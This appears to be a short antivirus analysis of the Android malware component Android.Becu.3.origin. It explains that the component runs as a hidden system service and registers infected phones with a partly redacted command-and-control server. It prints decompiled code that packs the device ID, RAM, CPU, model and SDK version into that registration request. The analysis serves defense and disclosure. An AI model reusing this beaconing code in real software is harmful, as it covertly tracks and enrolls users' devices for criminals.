This malicious program is a component of Android.Becu.1.origin. Android.Becu.3.origin does not create a shortcut on the home screen; it operates as a system service and is named as com.zgs.ga.pack package. After being downloaded by Android.Becu.1.origin from the remote control center, the malware launches itself.
Android.Becu.3.origin, by using a json request, registers an infected mobile device on the command and control server at http://[xxxxxxxx]qs.mobi/houtai/clientregister.php?token=:
JSONObject v3 = new JSONObject();
try {
v3.put("project_id", this.b());
v3.put("unique_id", Settings$Secure.getString(((Context)this).getContentResolver(),
"android_id"));
JSONObject v4_1 = new JSONObject();
v4_1.put("ram", c.a());
v4_1.put("cpucores", c.b());
v4_1.put("build", Build.MODEL);
v4_1.put("sdk", Build$VERSION.SDK_INT);
v3.put("info", v4_1);
As a result, cybercriminals receive information about the active copies of Android.Becu.1.origin.